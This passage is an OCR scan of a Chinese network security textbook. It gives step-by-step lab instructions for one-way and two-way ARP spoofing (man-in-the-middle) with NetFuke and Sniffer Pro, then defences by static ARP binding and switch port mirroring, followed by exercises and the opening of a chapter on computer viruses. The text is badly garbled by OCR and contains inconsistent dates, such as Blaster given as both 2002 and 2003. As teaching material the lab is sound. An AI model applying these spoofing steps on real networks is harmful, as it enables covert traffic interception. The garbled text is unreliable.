网 上 选择: [ericeUF_IH4SAEAIS-CTOD-AC |。 本 机 








控制 选项 
厂 启用 IcWF 基 纺 。 《、 订 启用 湿 录 模式 监听 
厂 启用 过 站 器 厂 启用 分 析 器 厂 启用 修改 器 
ct 他 主动 转发 个 关闭 转发 
数据 包 缓 冲 区 了 末 关闭 绥 中 区 回 显 
厂 缓 中 区 自动 保存 目录: [ae ] 
驱动 过 下 








确定 取消 




















图 3-29 “ 嗅 探 设置 ?对 话 框 


步骤 4: 选择 “设置 ">“ARP 欺骗 "命令 ,打开 “ARP 欺骗 设置 ”对 话 框 ,设置 “欺骗 方 
式 ” 为 “ 单 向 欺骗 ”", “来 源 IP” 为 192. 168. 10. 12,“ 中 间 人 IP” 为 本 机 IP(192. 168. 10. 11)， 
94 
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“目标 IP” 为 192. 168. 10.2,“ 来 源 MAC” 和 “目标 MAC” 由 计算 机 自动 设置 “中 间 人 MAC” 
为 010101010101( 伪 造 的 ,实际 并 不 存在 ) ,如 图 3-30 所 示 , 单 击 “ 确 定 ” 按 钮 。 






























ARPR 骗 设置 Ea 
其 编 配置 
其 咏 方 式 : |>>>>> 单 向 其 编 >>>>》 二] 来源 下 ”> 目标? 
来 淹 ， [站 “155 10 12 来 源 WC 厂 指 wc 
中 间 人 IE: | 192 .168 ， 10 11 中间人 WAC: 5l10101010101 
目标 IP 192 .168 . 10 .2 目标 Ac: aoc 厂 指证 wc 








其 咏 异 式 : (ARP_Response (ARP_Request 
灰 普 换 目标 数据 包 的 源 mae 证 车 换 来 源 数 据 包 的 源 ws< 粹 号 超时 : [3000 ms 


注意 :默认 中 间 人 是 自身 IP 和 自身 WAC 











确定 取消 |] 
图 3-30 ”ARP 单 向 欺骗 
步骤 $: 单 击 工具 栏 中 的 “开始 ”按钮 辽 ,开始 ARP 单 向 欺骗 。 


步骤 6: 在 主机 B(192. 168. 10. 12) 上 再 次 执行 arp -a 命令 ,查询 网 关 (192. 168. 10. 2) 
的 MAC 地址 已 经 由 00-50-56-fc-c5-a0 改 为 01-01-01-01-01-01, 如 图 3-31 所 示 。 


1e-58 
人 一 人 
98-BB-16 
91-98 
上 一 中 一 人 


88-59-56-cg-99-98 
GETIETETETETI 
99 
BB-58-56-f4-4e 
FF-FE FF -Ff -ff 
01-88 98-98-16 
901-80 98-f c 
FFEE -EFFE -EEFE 








图 3-31 网 关 的 MAC 地 址 已 修改 


步骤 7: 在 主机 B(192. 168. 10. 12) 上 再 次 访问 www. baidu. com 网 址 ,验证 已 不 能 正 
常 上 网 。 单 击 工具 栏 中 的 “停止 ?按钮 国 ,结束 ARP 单 向 欺骗 。 
3) ARP 双向 欺骗 
ARP 双向 欺骗 指 的 是 通信 过 程 “S( 来 源 IP)1 M( 中 间 人 IP)1 D( 目 标 IP)”, 即 实际 通 
信 中 S 和 D 之 间 的 通信 数据 经 过 了 M, 但 S 和 了 D 对 此 并 不 知情 ,这 可 能 会 造成 一 些 重要 数 
据 的 泄密 。 在 开始 欺骗 的 时 候 ,M 就 要 发 送 ARP 欺骗 数据 包 给 S, 欺 骗 S 并 使 其 认为 M 就 
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是 D。 另 外 ,M 也 要 发 送 ARP 欺骗 数据 包 给 D, 欺 骗 D 并 使 其 认为 M 就 是 S。 

步骤 1: 在 攻击 主机 A(192. 168. 10. 11) 上 运行 Sniffer Pro 程序 ,在 打开 的 Sniffer Pro 
主 窗口 中 ,选择 菜单 “捕获 ”一 “定义 过 滤器 "命令 ,打开 “定义 过 滤器 -捕获 ”对 话 框 ,在 “高 级 ” 
选项 卡 中 ,选中 ARP 复 选 框 ,如 图 3-32 所 示 , 单 击 “ 确 定 ” 按 钮 。 然 后 单 击 工具 栏 中 的 捕获 
“开始 ?按钮 ， ,开始 捕获 ARP 数据 包 。 









摘要 | 地址 | 数据 模式 高 级 | 组 中 | 




















图 3-32 “定义 过 滤器 -捕获 ”对 话 框 


步骤 2: 在 NetFuke 程序 界面 中 ,选择 “设置 ”>“ 嗅 探 设 置 "命令 ,打开 “ 嗅 探 设 置 " 对 话 
框 ,在 “网 卡 选择 ”下 拉 列 表 框 中 要 选择 工作 在 实验 网 络 环境 中 的 网 卡 , 选 中 “启用 ARP 坎 
骗 " 和 “启用 混杂 模式 监听 ” 复 选 框 ,选中 “主动 转发 " 单 选 按 钮 , 单 击 “ 确 定 ” 按 钮 。 

步骤 3: 选择 “设置 ">“ARP 欺骗 "命令 ,打开 “ARP 欺骗 设置 "对话 框 ,设置 “欺骗 方 
式 ” 为 “双向 欺骗 ", “来 源 IP” 为 192. 168. 10. 12, 来源 MAC” 为 000C29FBD435;“ 中 间 人 
IP” 为 本 机 IP(192. 168. 10. 11),“ 中 间 人 MAC” 为 本 机 真实 MAC 地 址 000C2904613E; 
“目标 IP” 为 192. 168. 10. 2,“ 目 标 MAC” 为 005056FCC5A0, 如 图 3-33 所 示 , 单 击 “ 确 定 ” 
按钮 。 


其 纺 本 置 
其 咏 方 式 : [<<<<<Gmia 编 >>>>》 二 ] 来源。 “> 目标 TP 


来 源 P， 门 全 156 10 12 来源 Wc: 500c26F60455 ”|S 指定 Wc 
中 间 人 IP: [92 165 10 11 中间人 MAC: 00c2904613E 

目标 PP: 1 166 .10 .2 BW: 5G5055FcC5A  。 指定 WC 
其 编 模式 : (ARP_Response ARP_Request 


末 普 搞 目 标 未 据 包 9 源 nae。 厅 车 接 末 源 孝 所 包 的 源 aa。 其 编 反 8 F000 ns 











注意 :默认 中 间 人 是 自身 下 和 自身 WAC 











弓 王 ]] 思 陋 
图 3-33 ARP 双向 欺骗 











步骤 4: 单 击 工 具 栏 中 的 “开始 "按钮 从 ,开始 ARP 双向 欺骗 。 
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步骤 $: 在 主机 B(192. 168. 10. 12) 上 再 次 执行 arp -a 命令 ,查询 网 关 (192. 168. 10. 2) 
的 MAC 地 址 已 经 由 00-50-56-fc-c5-a0 改 为 00-0c-29-04-61-3e, 而 这 是 攻击 主机 A(192. 168. 
10. 11) 的 MAC 地 址 ,如 图 3-34 所 示 , 这 说 明 攻击 主机 A 已 冒充 为 网 关 (192. 168. 10. 2) 。 


ETEEIITETEEEETPTTETTC | 日 | 关 | 
[=| 








图 3-34 攻击 主机 A 已 冒充 为 网 关 


步骤 6: 在 主机 B(192. 168. 10. 12) 上 再 次 访问 www. baidu. com 网 址 ,验证 还 能 正常 
上 网 ,但 主机 B 并 不 知晓 所 有 通信 数据 均 经 过 了 攻击 主机 A。 单 击 工具 栏 中 的 “停止 ? 按 
钮 图 ,结束 ARP 双向 欺骗 。 

步骤 7: 在 攻击 主机 A(192. 168. 10. 11) 上 ,发 现 Sniffer Pro 已 经 捕获 到 ARP 数据 包 
了 (“停止 和 显示 "按钮 网 的 颜色 由 灰色 变 成 黑色 ), 单 击 “ 停 止 和 显示 ”按钮 网 ,停止 捕获 并 
显示 捕获 到 的 数据 包 。 

如 图 3-35 所 示 ,序号 为 1 的 数据 包 显示 了 对 主机 B(192. 168. 10. 12) 的 欺骗 攻击 过 程 ， 
告诉 主机 B(192. 168. 10. 12): 网 关 (192. 168. 10. 2) 的 MAC 地 址 为 000C2904613E ,而 这 
乐 上 是 攻击 主机 A 的 MAC 地 址 , 即 攻击 主机 A 冒充 为 网 关 。 























村 地 
000Cc29EB RP. RP 92 168 10 
DOSOS6FCCSAO 。 | ARP: R PA=[192.168.10 
000C29F1 ARP: R PA=[192.168.10.2 

JARP: R PA=[192 168.10 12] Hi 




























日本 ARP: 一 一 - ARP/RARP frane -一 一 - 
DD ARP 
WY ARP: Hardvare type = 1 (10Mb Ethernet) 
DB ARP; Protocol type = 0800 (IP) 
3 ARP: Length of hardware address = 6 bytes | 
LY ARP: Length of protocol address = 4 bytes | 
LY ARP: Opcode 2 (ARP reply) 
DY ARP: Sender's hardvare address 
LY ARP: Sender's protocol address 
DB ARP: Target hardware address 
与 aPP Target protocol address 








0000000. 00 Oc 29 fb d4 35 00 0c 29 04 61 3e 09 06 gg  ) 5 )= 时 
00000010 08 00 06 04 00 02 00 Oc 29 04 61 3e c0 ag Oa 02 . . . . ) -a? 插 -. 
00000020 ;Doloalaglesladssieolsaloaloe 00 00 00 00 00 00 MMNS 
oo000030: 00 00 00 00 00 00 00 00 00 00 00 00 











专家 入 角 码 人 租 血 人 主机 列表 人 Prolocol Dist 入 于 看 统计 表 为 这 当前 对 活 / 








图 3-35 攻击 主机 A 冒充 为 网 关 


如 图 3-36 所 示 ,序号 为 2 的 数据 包 显 示 了 对 网 关 (192. 168. 10. 2) 的 欺骗 攻击 过 程 , 告 
诉 网 关 (192. 168. 10. 2): 主机 B(192. 168. 10. 12) 的 MAC 地 址 为 000C2904613E ,而 这 
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MAC 地 址 实际 上 是 攻击 主机 A 的 MAC 地 址 , 即 攻击 主机 A 冒充 为 主机 B。 





MH 000C2904613E | 000C29FBD435 | ARP. R PA=[192 169 10 2] HA=-000C2904613E ERO| 


000C2904613E |000C29FBD435 |ARP: R PA=[192.168.10.2] HA=000C2904613E PRO| 
000C2904613E ”| 005056FCCSA0 |ARP: R PA=[192.168 10.12] HA=000C2904613E PR| 
» 





FS 











ARE7RARE frane 一 加 
有 

ARP: Hardware type = 1 (10Mb Ethernet) 
-DY ARP: Protocol type = 0800 (IP) 


ARP: Length of protocol address = 4 bytes 
ARP; Opcode 2 (ARP reply) 


ARP; Sender's hardvare address =/000C2904613E 

ARP: Sender's protocol address | [192.168.10.12] 

ARP; Target hardware address D005056FCCSAO 

ARP; Target protocol address =\[192.168 .10.2] 司 


0000000 00 50 56 fc c5 a0 00 0c 29 04 61 3e 06 06 By 7 ) ay 
00000010 
00000020 00 00 00 00 00 00 


00000030; 00 00 00 00 00 00 00 00 00 00 00 00 


前 到 


ARP: Length of hardware address = 6 bytes | 











图 3-36 攻击 主机 A 冒充 为 主机 B 


4) ARP 欺骗 攻击 的 防范 

针对 ARP 的 欺骗 攻击 ,比较 有 效 的 防范 方法 就 是 将 IP 地 址 与 MAC 地 址 进行 静态 绑 
定 。 对 于 新 的 ARP 表 项 ,可 用 “arp -s IP 地 址 MAC 地 址 ”命令 进行 静态 绑 定 ;但 对 于 已 有 
的 ARP 表 项 ,在 Windows 7/2008 中 出 于 安全 考虑 ,不 能 使 用 "arp -s IP 地 址 MAC 地 址 ” 命 
令 进 行 静态 绑 定 ,否则 会 出 现 *“ARP 项 添加 失败 : 拒绝 访问 ”的 错误 信息 ,此 时 可 使 用 以 下 
方法 进行 静态 绑 定 。 

步骤 1: 在 主机 A 中 ,执行 以 下 命令 : 

netsh i i show in 

netsh -c "i i" add ne 11 192.168.10.2 00- 50- 56- fc- c5- a0 

arp-a 


其 中 ,第 一 条 命令 netsh i i show in 是 netsh interface ipv4 show interfaces 的 缩写 ,用 
来 查看 “本 地 连接 ”对 应 的 Idx 值 (11) ,此 值 在 第 二 条 命令 中 会 用 到 ;第 二 条 命令 中 的 netsh - 
c "ii" add ne 是 netsh -c "interface ipv4" add neighbors 的 缩写 ,11 为 “本 地 连接 ”的 Idx 值 ， 
本 命令 实现 IP 地 址 与 MAC 地 址 的 静态 绑 定 ;第 三 条 命令 arp -a 用 来 查看 静态 绑 定 后 的 
ARP 缓存 表 ,结果 如 图 3-37 所 示 。 

说 明 删除 静态 绑 定 的 命令 为 netsh -c "ii" delete neighbors 11。 

步骤 2: 在 攻击 主机 A 中 再 重新 开始 一 次 相同 的 ARP 欺骗 攻击 ( 单 向 或 双向 )。 在 主 
机 B 中 再 次 执行 arp -a 命令 ,查看 192. 168. 10. 2 的 MAC 地 址 是 否 因 再 次 受到 ARP 欺骗 
攻击 而 改变 。 

如 图 3-38 所 示 , 当 IP 地 址 与 MAC 地 址 被 静态 绑 定 后 ,将 不 被 外 界 的 ARP 欺骗 数据 包 
所 改变 。 

步骤 3: 同 理 , 可 在 网 关 ( 一 般 是 路 由 器 ) 中 对 局 域 网 内 的 主机 IP 地 址 与 其 相应 MAC 
地 址 进行 静态 绑 定 ,防止 ARP 欺骗 攻击 。 
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168.18.2 88-58-56-fc-c 


图 3-37 将 IP 地 址 与 MAC 地 址 进行 静态 绑 定 


68 


68-5e 


fF 


fF 
gg 
98-5e 


9 


f4 
和 和 一 人 
5e-98 
00 
下 上 一人 


和 和 一 人 


99-08 


4e 
人 一 上 
80-16 
BQ-fc 
人 于 一 


上 于 一 上 


Se-00-00-16 


80- 


00-fc 


生生 一 人 一 人 一 人 一 人 一 上 








图 3-38 静态 绑 定 并 再 次 实施 ARP 欺骗 后 的 ARP 缓存 表 


35 拓展 提升 : 端口 镜像 


在 由 集线器 HUB 组 建 的 局 域 网 中 ,由 于 集线器 HUB 的 工作 机 理 是 广播 ,因此 只 要 把 
主机 网 卡 设置 成 混杂 方式 ,就 可 监听 到 集线器 任何 接口 上 传输 的 数据 。 但 现在 的 网 络 基本 








上 都 采用 交换 机 ,由 于 交换 机 采用 交换 的 工作 方式 ,只 有 发 出 请 求 的 端口 和 目的 端口 之 间 互 
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相 转 发 数据 ,并 不 向 其 他 端口 进行 广播 (只 有 当 MAC 地 址 表 中 无 相应 条 目 时 才 进 行 广播 )， 
所 以 必须 把 执行 网 络 监 听 的 主机 接 在 镜像 端口 上 ,才能 监听 到 被 镜像 的 端口 上 的 网 络 信息 。 
端口 镜像 就 是 将 一 个 或 多 个 源 端口 的 数据 流量 完全 复制 到 另外 一 个 目的 端口 上 ,以 便 
进行 网 络 监控 和 分 析 。 
(1) 思科 2950 系列 交换 机 的 端口 镜像 命令 的 使 用 方法 如 下 。 


monitor session 1 source interface £0/2,£0/3 both 

monitor session 1 destination interface f0/1 

上 述 两 条 命令 的 含义 是 : 把 端口 f0/2 和 f0/3 流入 和 流出 的 数据 复制 一 份 到 端口 {0/1， 
这 样 连接 在 端口 {0/1 上 的 Sniffer 主机 就 可 以 获得 端口 {0/2 和 fo/3 上 的 数据 了 。 

(2) 华为 / 华 三 目前 主流 交换 机 的 端口 镜像 命令 的 使 用 方法 如 下 。 

monitor- port e0/1 both 

mirroring- Port e0/2,e0/3 

上 述 两 条 命令 的 含义 是 : 把 端口 e0/2 和 e0/3 流入 和 流出 的 数据 复制 一 份 到 端口 
e0/1。 

(3) 锐 捷 交 换 机 和 神州 数码 交换 机 的 端口 镜像 命令 的 使 用 方法 与 思科 2950 系列 交换 
机 类 似 。 














习 题 

一 、 选 择 题 
1. TCP 和 UDP 属于 ( ) 协 议 。 

A. 网 络 层 B. 数据 链 路 层 C. 传输 层 D. 以 上 都 不 是 
2. ARP 属于 ( ) 协 议 。 

A. 网 络 层 B. 数据 链 路 层 C. 传输 层 D. 以 上 都 不 是 
3. TCP 连接 的 建立 需要 ( ) 次 握手 才能 实现 。 

A. 1 B. 2 C2 D. 4 
4. ICMP 报 文 是 被 封装 在 ( ) 中 而 传输 的 。 

A. IP 数据 报 B. TCP 报 文 C. UDP 报 文 D. 以 上 都 不 是 
5. 网 卡 的 接收 方式 有 ( ) 。( 多 选 题 ) 

A. 广播 方式 B. 组 播 方式 C. 直接 方式 D. 混杂 方式 
二 、 填空 题 
1. OSI/RM 模型 分 为 7 层 ,从 下 往 上 分 别 是 层 、 层 、 层 、 

层 、 层 、 层 和 层 。 
2. TCP/IP 参考 模型 分 为 4 层 : 层 、 层 、 层 和 层 。 
3. MAC 地 址 长 度 为 比特 ,MAC 广播 地 址 为 和 
4. 网 络 层 的 协议 主要 有 协议 、 协议 和 协议 。 
5. 传输 层 的 协议 有 协议 和 协议 。 
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6. TCP 连接 需要 次 “握手 ”。 
7. 网 卡通 常 有 方式 、 方式 、 方式 、 方式 4 种 接收 
方式 。 


Ea 


an mo 


传输 。 





、 简 答题 

. 请 画 出 以 太 网 数据 帧 的 格式 。 

. 请 画 出 ARP 数据 报 的 格式 。 

. 网 络 层 的 传输 协议 有 哪些 ? 

. TCP 协议 和 UDP 协议 有 何 区 别 ? 

. ICMP 报 文 有 何 作用 ? 

. 简 述 ARP 中 间 人 攻击 的 原理 。 

、 操 作 练 习题 

. 使 用 Sniffer 软件 捕捉 IP 协议 的 数据 包 ,并 与 IP 协议 的 格式 进行 对 比分 析 。 

. 使 用 Sniffer 软件 捕捉 ARP 协议 的 数据 包 , 并 与 ARP 协议 的 格式 进行 对 比分 析 。 
. 使 用 Sniffer 软件 捕捉 TCP 协议 的 数据 包 ,并 与 TCP 协议 的 格式 进行 对 比分 析 。 
. 使 用 Sniffer 软件 捕捉 UDP 协议 的 数据 包 , 并 与 UDP 协议 的 格式 进行 对 比分 析 。 
.使 用 Sniffer 软件 捕捉 TELNET 会 话 过 程 , 并 验证 登录 用 户 名 和 密码 是 否 明 文 


. 使 用 Sniffer 软件 捕捉 HTTP 访问 。 
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项 目 4 计算 机 病毒 及 防治 


【项 目 目标 】 


(1) 了 解 计算 机 病毒 的 定义 产生 和 发 展 。 
(2) 了 解 计算 机 病毒 的 特征 和 分 类 。 

(3) 了 解 宏 病毒 和 蠕虫 病毒 。 

(4) 了 解 木 马 程序 的 功能 、 分 类 和 基本 特征 。 
(5) 理解 病毒 检测 的 原理 。 

(6) 掌握 如 何 预防 计算 机 病毒 的 方法 。 

(7) 掌握 杀毒 软件 的 使 用 方法 。 

(8) 了 和 解 反弹 端口 木马 。 

(9) 了 解 手机 病毒 。 


41 项 目 提出 


有 一 天 ,小 李 在 进行 QQ 聊天 时 , 收 到 一 位 网 友 发 来 的 信息 ,如 图 4-1 所 示 , 出 于 好 奇 和 
对 网 友 的 信任 ,小 李 打 开 了 网 友 提 供 的 超 链接 ,此 时 突然 弹出 一 个 无 法 关闭 的 窗口 ,提示 系 









> 
[< 


489- 本 - 同 





图 4-1 QQ 聊天 窗口 








图 4-2 系统 在 一 分 钟 以 后 关机 


小 李 惊 呼 上 当 受 骗 ,那么 小 李 的 计算 机 究竟 怎么 了 ? 


42 项 目 分 析 


小 李 的 计算 机 中 了 冲击 波 (worm. blaster) 病 毒 。2002 年 8 月 12 日 ,冲击 波 病毒 导致 全 
球 范 围 内 数 以 亿 计 的 计算 机 中 毒 ,所 带 来 的 直接 经 济 损失 达 数 十 亿美 元 。 病 毒 运行 时 会 不 
断 地 利用 IP 扫描 技术 寻找 网 络 上 系统 为 Windows 2000/XP 的 计算 机 ,找到 后 就 利用 RPC 
缓冲 区 漏洞 攻击 该 系统 ,一 旦 攻击 成 功 ,病毒 体 将 会 被 传送 到 对 方 计算 机 中 进行 感染 ,使 系 
统 操作 异常 .不 断 重新 启动 、 甚 至 导致 系统 崩溃 。 另 外 ,该 病毒 还 会 对 Microsoft 的 一 个 升 
级 网 站 进行 拒绝 服务 攻击 ,导致 该 网 站 堵塞 ,使 用 户 无 法 通过 该 网 站 升级 系统 。 

病毒 手动 清除 方法 : 用 DOS 系统 启动 盘 启 动 并 进入 DOS 环境 下 .删除 “C:\windows\ 
msblast. exe” 文 件 ; 也 可 在 安全 模式 下 删除 该 文件 。 预 防 方法 : 打上 RPC 漏洞 安全 补丁 。 

在 Internet 技术 快速 发 展 的 今天 ,由 于 Internet 固有 的 缺陷 ,网 络 安全 问题 日 益 突 出 ， 
互联 网 上 陷阱 重重 ,危机 四 伏 ,病毒 木马 流氓 软件 、. 菜 乌黑 客 ,为 祸 甚 深 , 稍 不 留神 就 会 中 
招 一 一 系统 瘫痪 ,账号 被 盗 , 欲 哭 无 泪 。 

2016 年 1 至 6 月 ,瑞星 “ 云 安全 "系统 共 截 获 病毒 样本 总 量 2312 万 个 ,病毒 总 体 数量 比 
2015 年 同期 上 涨 20. 17%。 报 告 期 内 ,病毒 感染 次 数 2. 4 亿 次 ,感染 机 器 总 量 823 万 台 ， 
均 每 台 计算 机 感染 29. 16 次 病毒 。 

2016 年 上 半年 ,新 增 木马 病毒 占 总 体 病毒 的 52.78% ,依然 是 第 一 大 种 类 病毒 。 灰 色 软 
件 病毒 (垃圾 软件 、 广 告 软件 .黑客 工具 、 恶 意 过 软件 ) 为 第 二 大 种 类 病毒 , 占 总 体 新 增 病毒 样 
本 的 22.95%, 第 三 大 种 类 病毒 为 蠕虫 病毒 , 占 总 体 比 例 的 9. 83% ,这 三 种 类 型 的 病毒 共 占 
据 所 有 病毒 数量 85. 56% 的 比例 ,如 图 4-3 所 示 2, 可 见 目 前 网 民 面 临 的 首要 威胁 仍旧 来 自 
于 这 三 种 传统 的 病毒 类 型 。 

防范 计算 机 病毒 的 有 效 方法 是 除了 及 时 打上 各 种 安全 补丁 外 ,还 应 安装 反 病毒 工具 ,并 
进行 合理 设置 ,比较 常见 的 工具 有 360 杀毒 软件 ,360 安全 卫士 等 。 


@ 来 自 北 京 瑞星 信息 技术 股份 有 限 公 司 2016 年 上 半年 中 国信 息 安全 报告 之 个 人 互联 网 安全 。 
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图 4-3 2016 年 上 半年 主要 传播 的 病毒 类 型 


43 相关 知识 点 


4.3.1 计算 机 病毒 的 概念 


1. 计算 机 病毒 的 定义 

计算 机 病毒 在 (中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 条 例 ) 中 被 明确 定义 ,病毒 指 
“编制 者 在 计算 机 程序 中 插入 的 破坏 计算 机 功能 或 者 破坏 数据 ,影响 计算 机 使 用 并 且 能 够 自 
ee tnddl vid ell 

学 上 的 “病毒 ”不同 ,计算 机 病毒 不 是 天 然 存 在 的 ,是 某 些 人 利用 计算 机 软件 和 硬件 
ev 它 能 通过 某 种 途径 潜伏 在 计算 机 的 存储 介 
质 ( 或 程序 ) 里 , 当 达 到 某 种 条 件 时 即 被 激活 ,通过 修改 其 他 程序 的 方法 将 自己 的 精确 复制 或 
者 可 能 演化 的 形式 放 入 其 他 程序 中 ,从 而 感染 其 他 程序 ,对 计算 机 资源 进行 破坏 。 

2. 计算 机 病毒 的 产生 与 发 展 

随 着 计算 机 应 用 的 普及 ,早期 就 有 一 些 科普 作家 意识 到 可 能 会 有 人 利用 计算 机 进行 破 
坏 , 提 出 了 “计算 机 病毒 "这 个 概念 。 不 久 , 计 算 机 病毒 便 在 理论 .程序 上 都 得 到 了 证 实 。 

1949 年 ,计算 机 的 创始 人 汉 “。 诺 依 曼 发 表 ( 复 杂 自 动 装置 的 理论 及 组 织 的 进行 ) 的 论 
文 ,提出 了 计算 机 程序 可 以 在 内 存 中 进行 自我 复制 和 变异 的 理论 。 

1959 年 ,美国 著名 的 AT&T 贝尔 实验 室 中 , 三 个 年 轻 人 在 工作 之 余 ,很 无 聊 地 玩 起 一 
种 游戏 : 彼此 撰写 出 能 够 吃 掉 别 人 程序 的 程序 来 互相 作战 。 这 个 叫 * 磁 芯 大 战 ”(core war) 
的 游戏 ,进一步 将 计算 机 病毒 “传染 性 ”的 概念 体现 出 来 

1975 年 ,美国 科普 作家 约翰 . 布 鲁 勒 尔 写 了 一 本 名 为 (震荡 波 骑 士 ) 的 书 ,成 为 当年 最 
畅销 书 之 一 。 书 中 描述 一 个 极端 主义 政府 利用 超级 计算 机 网 络 控 制 民 众 , 自 由 主义 战士 利 
用 一 种 称 为 tapeworm 的 程序 ,感染 了 整个 网 络 ,致使 政府 不 得 不 关闭 这 个 网 络 ,最 终 打败 
了 极端 主义 政府 。 

1977 年 夏天 ,托马斯 。 捷 . 瑞安 的 科幻 小 说 (P-1 的 青春 ) 成 为 美国 的 畅销 书 , 艇 动 了 科 
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普 界 。 作 者 幻想 了 世界 上 第 一 个 计算 机 病毒 (P-1) ,可 以 从 一 台 计 算 机 传染 到 另 一 台 计算 
机 ,最 终 控制 了 7000 台 计 算 机 , 酿 成 了 一 场 灾难 。“ 计 算 机 病毒 "这 个 词 就 是 在 这 部 科幻 小 
说 中 首次 出 现 的 。 

1983 年 , 弗 雷 德 . 科恩 博士 研制 出 一 种 在 运行 过 程 中 可 以 复制 自身 的 破坏 性 程序 ,并 
在 全 美 计算 机 安全 会 议 上 提出 和 在 VAX II750 计算 机 上 演示 ,从 而 在 实验 上 验证 了 计算 
机 病毒 的 存在 ,这 也 是 公认 的 第 一 个 计算 机 病毒 程序 的 出 现 。 

世界 上 公认 的 第 一 个 在 个 人 计算 机 上 广泛 流行 的 病毒 是 1986 年 年 初 诞生 的 大 脑 
(Brain) 病 毒 ,又 称 “巴基斯坦 ”病毒 。 

1988 年 ,罗伯特 ， 莫 里 斯 (Robert Morris) 制 造 的 蠕虫 病毒 是 首 个 通过 网 络 传播 而 震撼 
世界 的 “计算 机 病毒 侵入 网 络 的 案件 ”。 

1991 年 ,在 第 一 次 海湾 战争 "沙漠 风暴 ”行动 前 ,美军 特工 将 计算 机 病毒 植 入 伊拉克 作 
战 指挥 系统 , 旨 在 破坏 伊拉克 防空 系统 .这 是 计算 机 病毒 第 一 次 用 于 军事 实战 。 

1995 年 ,出 现 了 第 一 个 针对 微软 Word 软件 的 宏 病毒 。1997 年 , 随 着 Office 97 的 发 
布 , 宏 病 毒 进入 空前 泛滥 的 阶段 ,这 一 年 被 公认 为 计算 机 “ 宏 病 毒 " 年 。 

1996 年 我 国 出 现 了 专门 用 来 生成 病毒 的 “病毒 生产 机 ”,“ 病 毒 生产 机 ”的 出 现 , 使 得 计 
算 机 病毒 的 编制 变 得 非常 容易 ,病毒 进入 了 “批量 生产 ”的 阶段 。 

1998 年 ,中 国 台湾 大 学 生 陈 盘 豪 研制 的 迄今 为 止 破坏 性 最 严重 的 病毒 一 CIH 病毒 ， 
也 是 世界 上 首 例 破坏 计算 机 硬件 的 病毒 。 它 发 作 时 不 仅 破坏 硬盘 的 引导 区 和 分 区 表 , 而 且 
破坏 计算 机 系统 的 BIOS, 导 致 主板 损坏 。1999 年 4 月 26 日 ,CIH 病毒 在 我 国 大 规模 爆发 ， 
造成 巨大 损失 。 

1999 年 ,Melissa 是 最 早 通过 电子 邮件 传播 的 病毒 之 一 , 当 用 户 打 开 一 封 电子 邮件 的 附 
件 ,病毒 会 自动 发 送 到 用 户 通讯 短 中 的 前 50 个 地 址 ,因此 这 个 病毒 在 数 小 时 之 内 传 遍 全 球 。 

2000 年 6 月 ,世界 上 第 一 个 手机 病毒 VBS. Timofonica 在 西班牙 出 现 。 

2003 年 ,冲击 波 病毒 利用 了 Microsoft 软件 中 的 一 个 缺陷 ,对 系统 端口 进行 疯狂 攻击 ， 
可 以 导致 系统 崩溃 。 

2007 年 “熊猫 烧香 "病毒 会 使 所 有 程序 图 标 变 成 能 猫 烧 香 ,并 使 它们 不 能 应 用 。 

2009 年 ,木马 下 载 器 病毒 会 产生 1000 一 2000 不 等 的 木马 病毒 ,导致 系统 崩溃 , 短 短 3 天 
变 成 360 安全 卫士 首 杀 榜 前 三 名 。 

2011 年 ,U 盘 寄 生 虫 病毒 利用 自动 播放 特性 激活 自身 ,运行 后 可 执行 下 载 其 他 恶意 程 
序 .感染 存储 设备 根 目录 等 功能 。 

2014 年 ,阿里 巴巴 宣称 遭受 有 史 以 来 最 大 的 DDoS 攻击 ,攻击 共 持续 了 14 个 小 时 , 攻 
击 峰值 流量 达到 453. 8Gbps。 

2016 年 ,悍马 (Hummer) 手 机 病毒 在 全 球 大 规模 爆发 ,悍马 病毒 平均 日 活跃 量 超过 
119 万 台 。 悍 马 病毒 感染 手机 之 后 ,会 首先 植 入 中 毒手 机 获得 系统 最 高 控制 权 , 再 频繁 弹出 
广告 ,后 台 下 载 静默 安装 众多 软件 或 其 他 病毒 ,中 毒手 机 用 户 会 损失 大 量 手机 流量 费 。 

计算 机 病毒 的 主要 发 展 趋势 有 以 下 6 个 方面 。 

(1) 网 络 成 为 计算 机 病毒 传播 的 主要 载体 .局 域 网 .Web 站 点 、 电 子 邮 件 .P2P、IM 聊天 
工具 都 成 为 病毒 传播 的 渠道 。 

(2) 网 络 蠕虫 成 为 最 主要 和 破坏 力 最 大 的 病毒 类 型 ,此 类 病毒 的 编写 更 加 简单 。 
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(3) 恶意 网 页 代码 ,脚本 及 ActiveX 的 使 用 ,使 基于 Web 页 面 的 攻击 成 为 破坏 的 新 类 
型 。 病 毒 的 传播 方式 以 网 页 挂 马 为 主 。 

(4) 出 现 带 有 明显 病毒 特征 的 木马 或 木马 特征 的 病毒 ,病毒 与 黑客 程序 紧密 结合 。 
毒 制造 ,传播 者 在 巨大 利益 的 驱使 下 ,利用 病毒 木马 技术 进行 网 络 盗窃 .诈骗 活动 ,通过 网 络 
贩卖 病毒 、 木 马 ,教授 病毒 编制 技术 和 网 络 攻击 技术 等 形式 的 网 络 犯罪 活动 明显 增多 。 

(5) 病毒 自我 防御 能 力 不 断 提高 ,难于 及 时 被 发 现 和 清除 。 此 外 ,病毒 生成 器 的 出 现 和 
使 用 ,使 得 病毒 变种 更 多 ,难于 清除 。 

(6) 跨 操 作 系 统 平台 病毒 出 现 ,病毒 作用 范围 不 仅 限于 普通 计算 机 。 随 着 移动 互联 网 
和 智能 手机 的 普及 ,手机 病毒 增长 迅猛 。 

3. 计算 机 病毒 发 作 的 症状 

很 显然 ,任何 计算 机 病毒 在 发 作 的 时 候 都 不 会 轻易 地 暴露 自己 ,但 是 ,由 于 其 作为 一 种 
特殊 的 程序 及 其 产生 的 破坏 作用 ,必然 会 对 计算 机 或 网 络 系统 产生 一 些 破坏 作用 ,也 就 必然 
产生 一 些 症状 ,常见 的 症状 主要 有 以 下 几 种 。 

(1) 计算 机 系统 运行 速度 减 慢 , 计 算 机 运行 比 平常 迟钝 ,程序 载 和 时间 比 平常 久 。 

(2) 磁盘 出 现 异常 访问 ,在 无 数据 读 / 写 要 求 时 ,系统 自动 频繁 读 / 写 磁盘 。 

(3) 屏幕 上 出 现 异常 显示 。 

(4) 文件 长 度 日期. 时间、 属性 等 发 生变 化 。 

(5) 系统 可 用 资源 (如 内 存 ) 容 量 忽 然 大 量 减少 ,CPU 利用 率 过 高 。 

(6) 系统 内 存 中 增加 一 些 不 熟悉 的 常 驻 程 序 , 或 注册 表 启 动 项 目 中 增加 了 一 些 特殊 
程序 。 

